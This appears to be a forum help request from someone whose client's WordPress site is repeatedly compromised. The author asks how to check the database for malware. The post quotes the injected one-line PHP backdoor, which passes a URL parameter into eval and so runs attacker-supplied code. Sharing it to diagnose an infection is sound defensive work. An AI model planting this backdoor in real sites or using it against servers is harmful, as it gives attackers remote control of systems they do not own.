One of our clients have a website that is getting repeatedly attacked. We added a secondary authentication to the wp_admin directory. All the files have 644 permissions in the root directory. What appears to be happening is that the first line of php files in the root directory are getting injected with the following code:
<?php echo "<!--isimsiz-->"; eval(@file_get_contents(@$_GET["isimsiz"]));
Everything is uptodate. I have restored all the files, but I suspect it might be in the WP database. My question is how do you check the WP database for any malware issues?
The site checks out clean according to http://sitecheck.sucuri.net. But I suspect the site will be hacked again. Any suggestions appreciated